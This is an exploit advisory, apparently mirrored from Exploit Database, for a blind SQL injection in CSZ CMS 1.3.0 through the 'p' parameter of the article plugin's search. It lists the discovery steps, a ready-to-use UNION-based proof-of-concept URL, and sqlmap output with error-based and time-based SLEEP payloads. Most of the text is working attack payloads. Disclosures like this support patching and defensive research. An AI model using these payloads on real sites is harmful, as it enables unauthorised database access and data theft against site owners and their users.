CSZ CMS 1.3.0 – ‘Multiple’ Blind SQLi

• Exploit Database
• 107 阅读

• 作者： Dogukan Dincer
  日期： 2022-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50899/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  # Exploit Title: CSZ CMS 1.3.0 - 'Multiple' Blind SQLi # Date: 2021-04-22 # Exploit Author: Dogukan Dincer # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.3.0.zip/download # Version: 1.3.0 # Tested on: Kali Linux, Windows 10, PHP 7.2.4, Apache 2.4   # Discovery of Vulnerability   - First go to CSZ CMS web page - then go to http://yourhost/plugin/article directory on CMS. - To see the error-based SQLi vulnerability, the ' character is entered in the search section. - It is determined that the "p" parameter creates the vulnerability. - Databases can be accessed with manual or automated tools.   # Proof of Concept   http://127.0.0.1/csz-cms/plugin/article/search?p=3D1'") UNION ALL SELECT CONCAT(0x717a7a6b71,0x5449414d6c63596c746759764a614d64727476796366686f4e6a7a474c4a414d6b616a4269684956,0x716a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -   # Sqlmap output:   Parameter: p (GET) Type: error-based Title: MySQL >=3D 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: p=3D1'") AND EXTRACTVALUE(8555,CONCAT(0x5c,0x717a7a6b71,(SELECT (ELT(8555=3D8555,1))),0x716a717a71))-- OUUO   Type: time-based blind Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP) Payload: p=3D1'") AND (SELECT 3910 FROM (SELECT(SLEEP(5)))qIap)-- ogLS